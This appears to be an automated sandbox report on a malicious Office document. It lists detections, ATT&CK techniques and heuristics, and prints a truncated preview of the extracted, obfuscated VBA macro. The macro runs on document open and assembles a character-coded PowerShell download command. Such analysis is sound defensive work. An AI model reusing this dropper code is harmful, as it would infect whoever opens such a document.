MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The 'Document_open' macro triggers a 'Shell()' call, indicating an attempt to execute arbitrary commands. This is further supported by the ClamAV detection name 'Doc.Dropper.Agent-6608874-0', suggesting it acts as a dropper for other malware. The VBA code's primary function appears to be executing a second-stage payload.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6608906-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6608906-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 39853 bytes |
SHA-256: 008bfd552b21340552ed4997b7525888f3fb5bf2b254c7d774b9eb1749ebf7c4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "AViwEYdl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
wdKXtP = (iwsCF - QPHTcn / 50424 / caZjO)
lLtBwP = (lYpMAY - rXNAuG / 25439 / czKuz)
WRjvc = (zsfGUt - QrGzi / 14482 / uSSKc)
FwWCko = (KWJlhF - YJojTw / 7454 / ASfTE)
pKTREnKIP = Application.Run("fpifwJK", "" + KKwVbHaaAi + AJvGiiWuJQ + JnnOSnQhNM + rDYOiY + qvhToqANRL + KauMU + rnQMX + ZCSjiq + hnXPzBMj + qTAajm + pfwZq + wjEmz + GWkUc + BIqVoT + wrEQihBYdEwM + iuZMpplqMPs)
zFipXu = (wYElp - jjtsV / 2144 / aSNTjz)
EzYSH = (OvoBE - qOTdt / 66149 / OOkYlQ)
End Sub
Attribute VB_Name = "UbmCbPQqJMjQTS"
Function JnnOSnQhNM()
On Error Resume Next
CzoNV = 25578 * zYSVtJ * (FPEqF + BFwaj)
hOZjjZ = 885 / 65495 - (wVjfbb * 1335)
mSEwhtWzD = "" + qmUVwzjjLU + khAiMinS + "pOWe" + WluWMwBNi + aImzzzL + "RshE" + DjztVTFNOA + vaPibZkniwqsH + "lL" + OkMlbAIMmn + srnwdTQ + " " + Chr(34) + WPYXafnFtFmL + dBPFonNcvZZsw + " \" + Chr(34) + NYriprVnNBVUHt + ozAKwNObs + " $(" + TzwijtFjhvhFzI + ETSFjNK + " S" + vjDzKQmUzBoPSm + NAUHsBC + "Et"
KHZPK = (11828 * OonJCh) / (iulBG * mlhsD * MqcCu - UmzINE)
ABiwRz = (61914 * pNGzwJ) / (YZhLot * lltciu * WhjOK - kGjbE)
BPvulK = (24152 * jjswCC) / (tFoQl * TjZll * pRqGHz - zWpzq)
ozMkwnGkC = "" + mAoQIXVNimnDci + IAaXJtalwr + " 'oF" + DFwtDJjflVcNU + TTvhOoUq + "S' '"
KntaCR = (32458 * cKYnu) / (SBDjn * NCFhG * DJqEj - IztWm)
BDuLc = "" + LvrtnjZ + NkkCSjHiL + "' ) " + NHcYbIfzHwOw + LSLLuatIucTz + "\" + Chr(34)
Nlobkw = (80651 * TTSiA) / (oSwmjS * RwWRt * FMzEcv - jVHnNC)
wstPZ = (33385 * bihQu) / (wpRJrH * sUOpiK * SLKZjY - SDdCU)
fhBXZl = "" + UXMAInjpiWvJ + iDjPYBQUHjW + " " + Chr(43) + " [" + loHWhzIzqdi + lVfClOm + "StR"
ZVEAj = (38051 * PcibJ) / (BXzNJF * nawNTQ * oEzIuq - PlRjQ)
aADawq = (39217 * DXEhI) / (zXrhSY * LfWjT * llhhtQ - MZunXZ)
KkiQlzS = "" + aDMhZQO + zPmPVhtdHiXVqL + "INg" + ZZcDJtwhJFS + JVWGivAuwEMt + "]( " + sIfjrvGAq + pERFGQPZrz + "(36 " + PIQPhdV + PaGYiVbY + ", 70" + ikjtqjpq + UCViIQbbfYWVWM + ", 1" + LjcvnBMniPf + jsmhRqNFbQ + "12 ," + AsGmINXTMXIOs + phwslMBzj + " 1"
FWMYkQ = (28021 * nIGAZ) / (HvMJj * oHXXY * Xcjwta - UIAHo)
zrWKjj = (43972 * dRopwK) / (zzoAF * mVpPfz * tHoYV - ZzlMor)
KbVidw = "" + PKDisTKBSohzNV + DiRwWcPTElDMmA + "14, " + MnFfLBFmiFWkos + ERkJqidmujZ + "61 ," + wORfkmaQB + cfPQGff + " 11" + cHUQwHiJTk + zVkqEEEGlLC + "0," + hLSMfOENhoqu + dHQwRGadJiZB + "101,"
FnRFlj = vLznV - NRhuw / 7484 + bwVOl / HDBomd / 76271 * ItXlIR + hwSJv * (MLbkdw - AHSCT * cNtXK * ivFXK)
wLXzWqBGw = "" + HtCCFqturaDJ + cAbURwpBnYHz + "119 " + GnRboLwGFPzdP + TUBiwTEwqr + ", 4" + FGduFdGnDJcUTm + MWojHfUEGUOUCr + "5," + zPrAbUrzJuSK + KMzJjTDGoZlZ + "111" + PmlMisUEuVUs + aNNJMYKCWtIGj + ", 9" + ROCfGkWJGcz + RcprpPj + "8 ," + cNQaNQrD + cddGRMYD + " 10" + HhMMEku + RQMzFmoPf + "6, 1" + RCAnkco + fQLcWFuBDW + "01 " + nnKvPiXTcw + zmEhZccwYjl + ",99" + jcArnMJ + dPqrUzQCuiYi + ",11" + ANbbufzGBJpj + cpkilMJprh + "6,3"
jWmDca = sAiLk - PnXNj / 3260 + wtZFzp / SaKWuT / 30764 * bTwhPc + WwdAT * (ZmbKf - hmwhG * hlSpHR * zQLDP)
MnXbcz = XsoiL - ziMim / 84860 + iqqjqL / TFNjMK / 87209 * uPVFI + JsdGv * (RRDhQ - FEVwq * QOCSiF * BVsnz)
KOQsYl = "" + iYzMZvIRCBjS + plzYkou + "2 " + NYkuhZdFYjoaf + QpIwAQwmhvjG + ",78" + YsoRhjnpAb + vIjAfJNNHv + " , " + MaPmCzBSojzqzI + wbohEcUqChQWt + "101 " + cMqFHUBnB + kPItBWLYRjG + ", 1" + jFZjViiYLPWdIC + unnHisFhJj + "16 ," + ULkWNzWB + SSvBYzlPs + "46" + EWtSsPrAsZ + TEAfAQLjoZbVV + ", 87" + TGvtoZpPorD + fBCsdcbwYTlz + ",10" + jfuXzfmXtwjAQ + LowvdBmWjsskj + "1 ,"
JtHlIk = TFpvHI - McMzI / 24430 + oEDmuJ / fFvFb / 13291 * mtfVER + qFiti * (WPfmY - HUpEzO * ioAtpf * Taihc)
bqzqY = "" + zwVsPtoP + hszRzpjG + "98 " + hqMsNdwwjwJU + WqjGwhtYakInBB + ", 6" + BWaMcHmcimzsjb + FBvGFZHvp + "7 " + ckabuTmzn + UPEGbMkBpzk + ", " + AGWobOfXUqKs
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.